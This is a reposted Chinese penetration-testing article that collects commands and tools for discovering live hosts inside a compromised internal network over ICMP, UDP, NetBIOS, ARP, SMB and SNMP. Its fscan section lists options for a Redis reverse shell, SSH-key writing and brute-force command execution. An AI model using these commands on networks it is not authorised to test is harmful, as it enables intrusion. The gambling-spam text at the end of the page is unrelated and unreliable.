吴忠躺衫网络科技有限公司

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

內網主機探測工具合集

jf_vLt34KHi ? 來源:Tide安全團隊 ? 2023-05-11 11:44 ? 次閱讀

前言

在拿下通內網的主機權限后,普遍需要更進一步的收集內網信息,此時如何有效快速的探測內網存活主機關系到我們下一步的進展情況。當然自從有了Fscan后,我們的效率已經大大提高,不過在某些情況下fscan有時會無法正常探測,此時如何使用其他方法有效地收集內網信息成了關鍵,這篇文章主要記錄一下在不同環境、不同條件下探測內網存活主機的方法。

內網主機探測的不同場景

我們主機掃描的場景主要分為三種:

1、獲取到了webshell,此時一般用系統命令或上傳腳本工具進行探測;

2、主機已在目標內網,比如已經通過正向或者反向代理搭建隧道的場景。此時可以考慮proxychains+Nmap掃描;

3、拿到了一個反彈的webshell,則可以考慮MSF。要根據不同的場景考慮支持存活探測的協議,包括了ARP、ICMP、SMB、 UDP、SNMP協議等;支持端口掃描的方式,包括TCP掃描、UDP掃描、ICMP掃描等。

內網不同協議主機探測的方式

ICMP協議探測

它是TCP/IP協議簇的一個子協議,用于在IP主機、路由器之間傳遞控制消息。控制消息是指網絡通不通、主機是否可達、路由是否可用等網絡本身的消息。這些控制消息雖然并不傳輸用戶數據,但是對于用戶數據的傳遞起著重要的作用。

ping

ping是我們一個常用工具,主要用來測試網絡連通性。也可以用它來完成對C段的探測,雖然效率低時間慢,但是不易出發安全規則。(服務器開啟防火墻或者禁ping的時候不可用,否則影響探測結果)

?Windows

 for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1|find /i "ttl="

3017aef4-ef45-11ed-90ce-dac502259ad0.png

這是我在CS里執行的ping命令,可以看到c段內有兩臺主機存活 也可以寫進文件里,方便后續查看。寫進C盤的話需要administer權限,可以考慮更換盤符

@for/l%iin(1,1,255)do@ping-n1-w40192.168.1.%i&iferrorlevel1(echo192.168.1.%i>>./a.txt)else(echo192.168.1.%i>>./111.txt)

Linux

for k in $( seq 1 255);do ping -c 1 10.211.55.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

3029e09c-ef45-11ed-90ce-dac502259ad0.png

另外,還可以結合系統自帶的traceroute、arp 、netstat等命令收集內網信息,curl、wget可以用來做端口探測

nmap

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4
#或者
nmap ‐sn ‐PE ‐T4 192.168.1.0/24

303b2ac8-ef45-11ed-90ce-dac502259ad0.png

UDP協議探測

Internet 協議集支持一個無連接的傳輸協議,該協議稱為用戶數據報協議(UDP,User Datagram Protocol)。UDP 為應用程序提供了一種無需建立連接就可以發送封裝的 IP 數據包的方法。

Msf

msf > use auxiliary/scanner/discovery/udp_probe
或者
msf > use auxiliary/scanner/discovery/udp_sweep

3056fab4-ef45-11ed-90ce-dac502259ad0.png

nmap

sudo nmap -sU -T5 -sV --max-retries 1 10.211.55.5 -p 500

3067f314-ef45-11ed-90ce-dac502259ad0.png

unicornscan(Linux下使用)

unicornscan-mU10.255.55.5

ScanLine(Windows下使用)

sl.exe -h -u 53,161,137,139 -O C:UsersAdministratorDes
ktoplog.txt -p 192.168.1.1-254

3084c228-ef45-11ed-90ce-dac502259ad0.png

Netbios協議

NetBIOS協議是由IBM公司開發,主要用于數十臺計算機的小型局域網。NetBIOS協議是一種在局域網上的程序可以使用的應用程序編程接口(API),為程序提供了請求低級服務的統一的命令集,作用是為了給局域網提供網絡以及其他特殊功能,幾乎所有的局域網都是在NetBIOS協議的基礎上工作的。

nmap

sudo nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4
309d8038-ef45-11ed-90ce-dac502259ad0.png

MSF

use auxiliary/scanner/netbios/nbname

30bbfef0-ef45-11ed-90ce-dac502259ad0.png

nbtscan掃描

互聯網搜索引擎nbtscan是一個掃描WINDOWS網絡NetBIOS信息的小工具,2005年11月23日發布。NBTSCAN身材嬌小,簡單快速。但只能用于局域網,可以顯示IP,主機名,用戶名稱和MAC地址等等。

下載地址:
http://www.unixwiz.net/tools/nbtscan.html#download
以Windows用法為例:nbtscan-1.0.35.exe -m 10.211.55.0/24

30d1674a-ef45-11ed-90ce-dac502259ad0.png

ARP協議

這是根據IP地址獲取物理地址的一個TCP/IP協議。主機發送信息時將包含目標IP地址的ARP請求廣播到局域網絡上的所有主機,并接收返回消息,以此確定目標的物理地址;收到返回消息后將該IP地址和物理地址存入本機ARP緩存中并保留一定時間,下次請求時直接查詢ARP緩存以節約資源。

nmap

nmap -sn -PR 10.211.55.1/24

30dd45f6-ef45-11ed-90ce-dac502259ad0.png

MSF

use auxiliary/scanner/discovery/arp_sweep

30f8caf6-ef45-11ed-90ce-dac502259ad0.png

netdiscover

Netdiscover是一種網絡掃描工具,通過ARP掃描發現活動主機,可以通過主動和被動兩種模式進行ARP掃描。通過主動發送ARP請求檢查網絡ARP流量,通過自動掃描模式掃描網絡地址。

sudo netdiscover -r 10.211.55.0/24 -i eth0

310c77fe-ef45-11ed-90ce-dac502259ad0.png

arp-scan

可以看到這工具掃描速度挺快的

sudo arp-scan --interface=eth0 --localnet

311ff5f4-ef45-11ed-90ce-dac502259ad0.png

SMB協議

SMB(Server Message Block)通信協議是微軟和英特爾在1987年制定的協議,主要是作為Microsoft網絡的通訊協議。SMB 是在會話層(session layer)和表示層(presentation layer)以及小部分應用層(application layer)的協議。

Msf

use auxiliary/scanner/smb/smb_version

3135cfdc-ef45-11ed-90ce-dac502259ad0.png

nmap

nmap -sU -sS --script smb-enum-shares.nse  -p 445 10.211.55.3

314bb8ec-ef45-11ed-90ce-dac502259ad0.png通過cmd
for /l %a in (1,1,254) do start /min /low telnet 10.211.55.%a 445

crackmapexec

CrackMapExec(CME)是一款后滲透利用工具,可幫助自動化大型活動目錄(AD)網絡安全評估任務。其締造者@byt3bl33d3r稱,該工具的生存概念是,“利用AD內置功能/協議達成其功能,并規避大多數終端防護/IDS/IPS解決方案。”

cme smb 10.211.55.0/24

SNMP協議

SNMP 是專門設計用于在 IP 網絡管理網絡節點(服務器、工作站、路由器、交換機及HUBS等)的一種標準協議,它是一種應用層協議。SNMP 使網絡管理員能夠管理網絡效能,發現并解決網絡問題以及規劃網絡增長。通過 SNMP 接收隨機消息(及事件報告)網絡管理系統獲知網絡出現問題。

nmap

sudo nmap -sU --script snmp-brute 10.211.55.0/24 -T4

3165bc10-ef45-11ed-90ce-dac502259ad0.png

Msf

use auxiliary/scanner/snmp/snmp_enum
317fa922-ef45-11ed-90ce-dac502259ad0.png

snmp for pl

這些 perl 腳本用于從目標系統中提取 SNMP 數據并解析這些文件以獲取潛在的可用數據。

項目地址:https://github.com/dheiland-r7/snmp

這個工具在使用前需要編譯,這里參考網上大佬的教程

wget http://www.cpan.org/modules/by-module/NetAddr/NetAddr-IP-4.078.tar.gz
tar xvzf ./NetAddr-IP-4.078.tar.gz
cd NetAddr-IP-4.078/
perl Makefile.PL
make
make install

31991dda-ef45-11ed-90ce-dac502259ad0.png
使用方法:./snmpbw.pl 192.168.0.1 public 2 1
 ./snmpbw.pl ipfile.txt  public 2 4

31b43d9a-ef45-11ed-90ce-dac502259ad0.png

常見的一些其它工具

Fscan

這個就不多介紹了,太常見

fscan -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/24  (默認使用全部模塊)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫私鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令執行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)

通過powershell腳本掃描IP地址存活

這里列舉幾個項目地址:

https://github.com/nettitude/PoshC2_Old/blob/master/Modules/Invoke-Arpscan.ps1
https://github.com/dwj7738/My-Powershell-Repository/blob/master/Scripts/Invoke-TSPingSweep.ps1

使用方法:

powershell.exe -exec bypass -Command "Import-Module .arpscan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"
powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.1.255"
此外,還可以用powershell實現基本的端口掃描功能

針對單個IP的多個端口的掃描

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null

31c9359c-ef45-11ed-90ce-dac502259ad0.png針對單個IP的多個端口的掃描
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null
31de04f4-ef45-11ed-90ce-dac502259ad0.png針對某IP段 & 多個端口的掃描
1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.$a",$_)) "Port $_ is open!"} 2>$null}
31ed3bb8-ef45-11ed-90ce-dac502259ad0.png

PTscan

PTscan(Phantom scanner) 是一款界面友好的輕量級web應用資產掃描器,適合于內網滲透測試環境下web的資產快捷識別,只需Python環境,無需第三方擴展庫,掃描結果使用zoomeye網頁樣式。
PTscan參考了F-NAScan的設計思路,在其基礎上修改而成,把程序重心放在WEB掃描和識別功能上。
使用方法:

Usage: python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306]  [-m 50] [-t 10] [-n] [-b] [-r]
##
-f  指定掃描目標文件,文件格式如list.txt所示,同時支持IP和URL
-h  指定掃描IP或IP段,支持段掃描,如192.168.1 即為掃描C段,192.168 即為掃描B段
-p  指定掃描端口,缺省使用程序中的配置端口
-m  指定線程數
-t  指定timeout
-n  不進行ping操作,直接掃描
-b  開啟Banner識別

-r ReverseIP



審核編輯 :李倩


聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • Web
    Web
    +關注

    關注

    2

    文章

    1269

    瀏覽量

    69733
  • UDP協議
    +關注

    關注

    0

    文章

    70

    瀏覽量

    12775
  • 數據包
    +關注

    關注

    0

    文章

    267

    瀏覽量

    24504

原文標題:內網主機探測工具合集

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    幫朋友做的脈沖探測主機

    探測主機
    電子愛好者(松哥)
    發布于 :2023年12月08日 11:50:47

    Labview如何在兩臺不同內網主機的vi之間通信

    我想問下,如何在當前主機vi中的子面板里顯示和控制另一個遠程主機中的vi程序呢?兩臺機器不在一個局域網內,有可能都不是公網IP,用路由器接上互聯網的,這時候怎么樣實現兩臺內網主機之間的通信,不是用web發布;望知道的大神指點迷津
    發表于 08-19 17:07

    【WRTnode2R申請】物聯網主機

    申請理由:原有方案使用stm32以及工控機,對wifi的原生支持不太好,因為手機等聯網比較麻煩,畢竟農業物聯網不具備特別好的實施環境所以我準備換掉方案項目描述:準備實現新版本的農業物聯網主機,代替
    發表于 09-10 11:27

    nat的類型有哪些

    NAT分為兩大類,基本的NAT和NAPT(Network Address/Port Translator)。 基本的NAT,它僅將內網主機的私有IP地址轉換成公網IP地址,但并不將TCP/UDP端口
    發表于 11-04 09:17

    FPipe是怎樣通過本地的53端口轉發到內網的3389端口上的

    0.0.0.0 -s 53 -r 3389 192.168.222.137然后回到本地來遠程連接就可以了 0x03 msf正向上線這里我們使用bind型的payload,保證讓無法正常上網的內網主機也能正常反彈
    發表于 07-25 15:04

    四個方法探測服務器的內網存活主機

    在滲透中,當我們拿下一臺服務器作為跳板機進一步進行內網滲透時,往往需要通過主機存活探測和端口掃描來收集內網資產。
    的頭像 發表于 09-27 15:18 ?1.4w次閱讀
    四個方法<b class='flag-5'>探測</b>服務器的<b class='flag-5'>內網</b>存活<b class='flag-5'>主機</b>

    外網用戶通過外網地址訪問內網服務器實驗配置

    網主機通過域名訪問Web服務器,首先需要通過訪問內網DNS服務器獲取Web服務器的IP地址,因此需要通過配置NAT內部服務器將DNS服務器的內網IP地址和DNS服務端口映射為一個外網地址和端口。
    的頭像 發表于 08-31 10:53 ?3009次閱讀

    一款支持弱口令爆破的內網資產探測漏洞掃描工具SweetBabyScan

    輕量級內網資產探測漏洞掃描工具:SweetBabyScan,是一款支持弱口令爆破的內網資產探測漏洞掃描
    的頭像 發表于 12-02 09:23 ?4982次閱讀

    一款支持弱口令爆破的內網資產探測漏洞掃描工具

    甜心寶貝是一款支持弱口令爆破的內網資產探測漏洞掃描工具,集成了Xray與Nuclei的Poc。
    的頭像 發表于 12-14 09:48 ?4021次閱讀

    一款內網探測工具

    工具內置 Top1000 端口探測同時也支持自定義端口探測,支持最新 nmap_service_probes 規則進行服務指紋識別,支持對 SSH/SMB/Mysql/SqlServer
    的頭像 發表于 08-09 16:09 ?601次閱讀

    內網穿透工具的種類、原理和使用方法

    本文以滲透的視角,總結幾種個人常用的內網穿透,內網代理工具,介紹其簡單原理和使用方法。
    的頭像 發表于 08-25 10:35 ?2149次閱讀
    <b class='flag-5'>內網</b>穿透<b class='flag-5'>工具</b>的種類、原理和使用方法

    智慧樓宇的心臟:E6000物聯網主機

    智慧樓宇是指通過全面覆蓋的感知設備和互聯網技術,為建筑提供高效、舒適、安全、環保、可持續的智能化服務。 在科技快速發展的今天,智慧樓宇已經不再是遙不可及的夢想。而在這個夢想成真的過程中,物聯網主機
    的頭像 發表于 02-23 16:36 ?435次閱讀
    智慧樓宇的心臟:E6000物聯<b class='flag-5'>網主機</b>

    物聯網主機:為智能交通賦能

    物聯網(IoT)技術的發展為智能交通領域帶來了許多創新的解決方案。而在物聯網應用中,物聯網主機起著關鍵的作用。本文將為大家介紹一款名為E6000的物聯網主機,它是一種多協議、多接口的物聯網主機,為
    的頭像 發表于 02-23 16:44 ?573次閱讀
    物聯<b class='flag-5'>網主機</b>:為智能交通賦能

    物聯網主機 E6000 在智慧工地上的應用

    隨著科技的不斷發展,智慧工地的概念逐漸普及。物聯網技術的應用為工地管理帶來了革命性的變化,物聯網主機E6000作為一款領先的物聯網主機設備,在智慧工地上發揮著重要作用。 物聯網主機 E6000
    的頭像 發表于 06-20 16:03 ?322次閱讀
    物聯<b class='flag-5'>網主機</b> E6000 在智慧工地上的應用

    常見的內網穿透工具對比

    國內的內網穿透工具有不少選擇,適合不同的使用場景和需求。以下是一些比較常見的國內內網穿透工具
    的頭像 發表于 11-06 14:59 ?1325次閱讀
    百家乐怎么样投注| 真人百家乐网西陆| 百家乐官网网址官网| 百家乐鸿泰棋牌| 百家乐网上赌场| 大发888在线赌场网站| 易盈娱乐| 百家乐官网注册优惠平台| 菲律宾百家乐官网娱乐| 玩百家乐官网有何技巧| 澳门百家乐大小| 大发888娱乐方| 百家乐官网玩法百科| 长江百家乐官网的玩法技巧和规则| 赌博百家乐规则| 大发888 真钱娱乐场| 百家乐官网庄闲必赢| 百家乐官网技巧平注常赢法| 百家乐保证赢| 鸿博娱乐城| 模拟百家乐官网下载| 最新百家乐双面数字筹码| 鼎丰娱乐城开户| 百家乐官网龙虎桌布| 百家乐烫金筹码| 大发88846| 优博百家乐官网现金网平台| 百家乐连开6把小| 蜀都棋牌游戏| 天博国际| 互博百家乐官网的玩法技巧和规则 | 粤港澳百家乐官网娱乐网| 百家乐怎样出千| 澳门赌场图片| 免费百家乐官网缩水软件| 广州太阳城大酒店| 大亨百家乐官网游戏| 百家乐出庄概率| 威尼斯人娱乐城网址| 百家乐官网扑克桌布| 新时代百家乐官网的玩法技巧和规则 |